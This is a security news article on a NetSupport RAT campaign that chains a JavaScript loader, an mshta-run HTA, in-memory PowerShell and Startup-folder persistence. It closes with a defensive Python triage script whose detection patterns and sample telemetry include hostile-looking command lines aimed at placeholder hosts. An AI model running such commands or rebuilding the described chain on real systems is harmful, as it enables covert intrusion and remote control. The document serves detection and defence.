Fileless Evasion: Multi-Stage Campaign Deploys NetSupport RAT via Obfuscated HTA
Researchers at Securonix have uncovered a multi-layered malware campaign designed to surreptitiously deploy the NetSupport RAT remote access tool. The attack unfolds through a series of carefully obfuscated stages, each engineered for maximum stealth and minimal forensic footprint on the compromised system.
The initial delivery begins with a JavaScript file embedded in compromised websites. This script features a complex structure and concealed logic that activates only under specific conditions. It can distinguish the user’s device type and detect whether the page is being visited for the first time, ensuring that the malicious routine executes only once per device. When the criteria are met, the script either injects an invisible frame into the page or retrieves the next stage in the chain—an HTML application.
At the second stage, an HTA file is executed covertly through the native Windows utility mshta.exe. This component extracts an encrypted PowerShell script, decrypts it through a multi-step process, and executes it directly in memory. As a result, the malicious activity leaves no persistent files on disk, significantly complicating detection by traditional antivirus solutions.
The final phase involves downloading and installing NetSupport RAT itself. The PowerShell script retrieves an archive, unpacks it into an inconspicuous directory, and launches the executable through a JScript wrapper. To maintain persistence, a shortcut masquerading as a Windows update component is placed in the system’s startup folder, allowing attackers to retain access even after a reboot.
NetSupport RAT, originally a legitimate remote administration tool, is frequently abused by threat actors for espionage, data theft, and full remote control. In this campaign, it grants attackers comprehensive command over infected systems, including keystroke capture, file manipulation, command execution, and proxy capabilities for lateral movement within the network.
According to analysts, the malicious infrastructure is actively maintained and regularly updated, with an architectural sophistication that points to highly skilled developers. The campaign primarily targets corporate users and spreads through decoy websites and concealed redirects. Despite its technical complexity, researchers have so far been unable to attribute the operation to any known cybercriminal group.
The campaign underscores the importance of blocking the execution of unsigned scripts, strengthening behavioral monitoring of system processes, closely inspecting startup directories, and analyzing anomalous network activity. Particular attention should be paid to restricting the use of mshta.exe and monitoring attempts to download files into %TEMP% and ProgramData directories.
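The monitoring recommendations above translate naturally into endpoint telemetry rules. The following is an added example, not detection content from Securonix or from the report it describes: it triages constructed process-creation and file-creation events (fields modelled loosely on Sysmon Event IDs 1 and 11) for mshta.exe running remote or inline script content, PowerShell spawned by mshta.exe or launched with encoded/in-memory flags, script hosts starting binaries out of %TEMP% or ProgramData, and shortcut files written to the user's Startup folder. All paths, the URL and the command lines in the sample events are placeholders.

```python
"""Defender-side triage of endpoint telemetry for the behaviours the article
describes. Added example; not Securonix's detection content. Event fields
loosely follow Sysmon Event ID 1 (process creation) and Event ID 11 (file
creation). Every sample event below is constructed."""
import re

# Directories the article names as staging locations, plus the per-user Startup folder.
STAGING_DIRS = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp|ProgramData)\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
# mshta.exe pulling content from a URL or running an inline script protocol handler.
MSHTA_REMOTE = re.compile(r"https?://|javascript:|vbscript:", re.I)
# Encoded or in-memory PowerShell execution patterns.
PS_INMEM = re.compile(r"-(enc|encodedcommand)\b|frombase64string|\biex\b|invoke-expression", re.I)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased final component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage_process(ev: dict) -> list[str]:
    """Reasons a process-creation event resembles the HTA -> PowerShell -> payload chain."""
    hits = []
    image, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image == "mshta.exe" and MSHTA_REMOTE.search(cmd):
        hits.append("mshta.exe executing remote or inline script content")
    if image in POWERSHELL and parent == "mshta.exe":
        hits.append("PowerShell spawned by mshta.exe")
    if image in POWERSHELL and PS_INMEM.search(cmd):
        hits.append("PowerShell with encoded or in-memory execution flags")
    if parent in SCRIPT_HOSTS and STAGING_DIRS.search(ev.get("Image", "")):
        hits.append(f"{parent} launched a binary from a staging directory")
    return hits


def triage_file(ev: dict) -> list[str]:
    """Reasons a file-creation event matches the staging or persistence steps."""
    target = ev.get("TargetFilename", "")
    low = target.lower()
    hits = []
    if STARTUP_DIR.search(target) and low.endswith(".lnk"):
        hits.append(f"shortcut dropped in Startup folder: {basename(target)}")
    if STAGING_DIRS.search(target) and low.endswith((".zip", ".exe", ".dll", ".js")):
        hits.append(f"payload-like file written to staging directory: {basename(target)}")
    return hits


def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Run each event through the matching rule set; return (index, hits) for events that fire."""
    results = []
    for idx, ev in enumerate(events):
        hits = triage_process(ev) if ev["type"] == "process" else triage_file(ev)
        if hits:
            results.append((idx, hits))
    return results


# Constructed sample telemetry: user name, directory names, URL and encoded blob are placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe https://stage2.example.invalid/update.hta"},
    {"type": "process", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"powershell.exe -w hidden -enc QQBBAEEA"},
    {"type": "file", "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\pkg.zip"},
    {"type": "process", "Image": r"C:\ProgramData\ExampleDir\client.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"C:\ProgramData\ExampleDir\client.exe"},
    {"type": "file", "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.lnk"},
    {"type": "process", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(hits))
```

Each rule on its own is noisy in a real estate (administrators do run encoded PowerShell, and legitimate installers write to ProgramData), so in practice these hits are best correlated per host within a short window: an mshta.exe launch with a URL, followed by PowerShell as its child and a new binary under ProgramData, is the chain the article describes and is far rarer than any single component.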